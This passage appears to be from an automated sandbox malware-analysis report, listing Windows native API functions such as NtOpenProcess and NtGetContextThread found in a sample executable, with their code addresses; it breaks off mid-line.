          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309B00 NtSetValueKey,3_2_01309B00
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309770 NtSetInformationFile,3_2_01309770
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130A770 NtOpenThread,3_2_0130A770
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309760 NtOpenProcess,3_2_01309760
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130A3B0 NtGetContextThread,3_2_0130A3B0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309610 NtEnumerateValueKey,3_2_01309610
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309A10 NtQuerySection,3_2_01309A10
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309670 NtQueryInformationProcess,3_2_01309670
          Source: C:\Users\use